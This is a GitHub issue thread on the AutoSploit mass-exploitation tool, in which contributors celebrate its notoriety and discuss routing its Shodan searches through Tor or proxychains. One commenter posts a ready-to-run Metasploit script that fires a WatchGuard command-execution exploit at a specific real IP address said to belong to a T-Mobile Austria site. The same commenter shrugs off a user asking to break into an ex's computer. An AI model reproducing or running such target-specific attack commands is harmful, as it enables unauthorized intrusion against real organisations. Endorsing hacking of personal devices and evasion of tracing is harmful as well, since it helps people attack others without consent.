### ISSUE TITLE
Not hate mail

### ISSUE THREAD

**Issue by Ekultek** [NullArray/AutoSploit#25]
You realize you just opened Pandora’s box on every able body in the world right? I love it, keep it up man.

**Comment by NullArray** [comment]
Lol thanks. Version 2 is going to be a team effort. Feel free to contribute if you'd like :+1:

**Comment by Ekultek** [comment]
Lol I’ll see what I can do, question about it though. Can you set proxies for the searches, haven’t had a chance to actually look at it yet.

**Comment by NullArray** [comment]
The way in which the hosts are gathered is through Shodan. Using shodan.io to find internet connected devices is not illegal so i don't know why you would want to proxy the connection to the search engine.

**Comment by Ekultek** [comment]
Fair enough, thank you.

**Comment by ageis** [comment]
FWIW after reading the reply here I located a passage in a book where Shodan's founder notes it's "not an anonymous service" and expresses approval of law enforcement action; one of the authors has worked extensively in government. This code is not illegal in itself and I'm not for such activity but SOCKS5 and/or Tor support would not be that hard.
![shodan](https://user-images.githubusercontent.com/1161532/35772073-e275c65c-08ec-11e8-91ff-f948942545a6.png)

Also congrats on earning the attention of the [White House](https://twitter.com/RobJoyce45/status/959154422029930496). :)

**Comment by Ekultek** [comment]
@ageis well the program only searches shodan and uses what it is capable of. There’s nothing illegal about that aspect of it. If you’re worried about it though you can just use proxychains with it. 

I hope the White House is reading this so I can say this, good thing you’re worried about this instead of the important things in the world jackasses.

**Comment by NullArray** [comment]
Thank you for looking that information up @aegis and yeah lol, i was pretty surprised someone from the White House was even commenting on this. AutoSploit really went viral.

Also, @Ekultek i think it should work fine through proxychains yeah. Haven't personally tested it, and it might be possible to add proxy support natively, if that's not a bit overkill.

**Comment by kimocoder** [comment]
AutoSploit is also mentioned over [here](https://www.digi.no/artikler/nytt-verktoy-gjor-hacking-enda-enklere-mange-stiller-seg-kritiske-til-utgivelsen/429525) - Digi.no is a Norwegian tech publishing news site. Great work, would be fun to test drive it. Keep up the good work.

**Comment by Ekultek** [comment]
People are ridiculous. How about instead of bashing the creator of it, they say `thanks for showing us where we have issues` I'm gonna help you develop this thing into a security experts fucking nightmare because they deserve it.

**Comment by Ekultek** [comment]
You also made it on [securitybuzz](http://www.informationsecuritybuzz.com/expert-comments/autosploit/), congratulations man, you're famous

**Comment by NullArray** [comment]
Lol, i suppose i am. Not quite sure whether this is a good or a bad thing yet.

**Comment by Ekultek** [comment]
Gotta respect this man for seeing the real problem:

```
On the other hand, Chris Roberts, chief security architect at Acalvio states:

” The kids are not more dangerous. They already were dangerous. We’ve simply given them a newer, simpler, shinier way to exploit everything that’s broken. Maybe we should fix the ROOT problem”.
```

**Comment by NullArray** [comment]
Interestingly Rapid7 had something to say about this as well. I thought their assessment was reasonable.

(On Random Shell Generators by Rapid7)[https://blog.rapid7.com/2018/02/02/on-random-shell-generators/]

Also, i like that they updated the article to include the fact that i intend to have functionality to load a single host or custom list in the new version. The reason why i am adding it is  to make the tool more precise and enhance it's utility no matter the engagement. 

Just felt that i should mention that as well.

**Comment by Ekultek** [comment]
@NullArray Rapid7 is usually pretty good at these kinds of things. I have massive respect for their teams and their company.

**Comment by navanchauhan** [comment]
It’s really easy to use tor, check my Mjolnir repo ( it’s a DoS tool :p)

**Comment by NullArray** [comment]
Hey @Ekultek got a way of contacting you via IM? Or something similar, i'd like to discuss some things with you. Perhaps add you as a collaborator with push/write access to the AutoSploit repo as well. Since you have been contributing so much. I'd love to get in touch, if you'd be interested.

**Comment by Ekultek** [comment]
@NullArray yo, just got home, yeah do you have discord?

**Comment by NullArray** [comment]
Nah i don't have discord but if you have a way for me to send you a private message i will send you my XMPP, addy so we can speak directly.

**Comment by Ekultek** [comment]
zeus.dork.scanner@gmail.com

send an email there and i'll direct you to my secure email

**Comment by NullArray** [comment]
For sure, i'll hit you up in a bit.

**Comment by Ekultek** [comment]
@NullArray alright man, talk to ya soon.

**Comment by NullArray** [comment]
@Ekultek I've sent you message and i am looking forward to your reply. :+1:

**Comment by Ekultek** [comment]
@NullArray I received it and replied from my secure email.

**Comment by NatoBoram** [comment]
At this point you could open up a Discord server to chat with contributors

**Comment by Ekultek** [comment]
@NatoBoram I’m not against that at all.

**Comment by Ekultek** [comment]
@NatoBoram discord server setup here's the invite https://discord.gg/9BeeZQk

**Comment by NullArray** [comment]
Hey, i've been away for a while, so i am out of the loop. Will catch up around Monday when i have some time on my hands.

**Comment by Ekultek** [comment]
@NullArray HE LIVES!

**Comment by NullArray** [comment]
So since this is basically the general 'off-topic' discussion thread with regards to this project, i just wanted to let people know that if they need to contact me through any other media than Github please feel free to DM me on twitter at https://twitter.com/Real__Vector

Alternatively i respond to PMs over at [GreySec Security Forums](https://greysec.net)

Oh and since i had a corrupted filesystem on one of the boxes i use, i haven't been around on the discord server either, since i happened to use that box for discord. Haven't gotten around to fixing it yet so i figured i would post some alternatives.

**Comment by NullArray** [comment]
A general discussion with regards to the project of course. Feel free to change the label if you can think of a more suitable one. Just figured i would label the conversation here as off topic and non-technical for the most part.

**Comment by Ekultek** [comment]
This thread has been dead for far to long. Someone talk

**Comment by N1kRolexx** [comment]
Well, I have read the tread, guys, and it seems that this tool is very powerfull. And I like it because I am a scrypt kidddy, can I use it to sneak into my ex's computer? haha

**Comment by Ekultek** [comment]
@N1kRolexx I mean if thats' what you want to do. It's not that it's _powerful_ it's that it brings to light a whole new playbook

**Comment by NullArray** [comment]
Merged for V2.1 release guys.

**Comment by Ekultek** [comment]
@N1kRolexx Use port 80 instead of port 443. HTTPS bypassed.

**Comment by N1kRolexx** [comment]
@Ekultek Ahah, nice joke)))) (no)

**Comment by Ekultek** [comment]
Just because this project makes me so happy, here’s an RPC script for https://www.tmobile.at:

```
workspace -a tmobile-attacks
use exploit/freebsd/http/watchguard_cmd_exec
setg lhost <YOUR-HOST>
setg lport <YOUR-PORT>
setg verbose true
setg threads 20
set rhost 212.166.122.131
set rhosts 212.166.122.131
run
```

**Comment by NullArray** [comment]
I was just thinking how awesome it is that through collaboration with multiple devs and contributions small or big, AutoSploit has really evolved into something amazing. I love the fact that this has become an Open Source endeavor in the truest sense of the word, and i would like to thank everyone who has been involved with the project thus far,

 You guys are great (n_n")

**Comment by Ekultek** [comment]
Haha, you’re the best man

**Comment by NullArray** [comment]
Almost at 3000 stars exactly! Pretty good milestone. :)

**Comment by NullArray** [comment]
I hear AutoSploit got mentioned at Thotcon, if you're reading this Thotcon attendees, hi!

**Comment by Ekultek** [comment]
Bullshit?

**Comment by NullArray** [comment]
No for real, someone that was in attendance reached out to me :+1:

**Comment by Ekultek** [comment]
Made a drastic change to the system call for starting services see https://github.com/NullArray/AutoSploit/commit/b998ad8b26ed10b8bd8b095241a808b111ffa574

**Comment by TheSecondSun** [comment]
@Ekultek Opened a Pandora's box with a Metasploit wrapper? Oh, I don't think so

**Comment by Ekultek** [comment]
@TheSecondSun it’s a little more advanced then a metasploit wrapper. I can see how people who don’t know how to code, read, turn on a computer, or think could get confused though. Have you even actually used it?

**Comment by Ekultek** [comment]
@TheSecondSun i use it as a pentest automation tool when I have other things to do, it has the ability to pass your own IP addresses into it and use those instead of blind exploitation.

**Comment by Ekultek** [comment]
@TheSecondSun it’s specifically geared towards exploitation. There has been talk about implementing a full pentest framework

**Comment by Ekultek** [comment]
Hello everyone, I'll be working on all the bug fixes tomorrow. So there should be a fix here soon

**Comment by Duplicitious** [comment]
@Ekultek do you know the command to actually run a specific exploit against some hosts?

**Comment by Ekultek** [comment]
@Duplicitious as in run one exploit against a host?

**Comment by Ekultek** [comment]
also the discord server is back up https://discord.gg/DZe4zr2

**Comment by Duplicitious** [comment]
Yeah like the command to run a single exploit against a list of already selected hosts
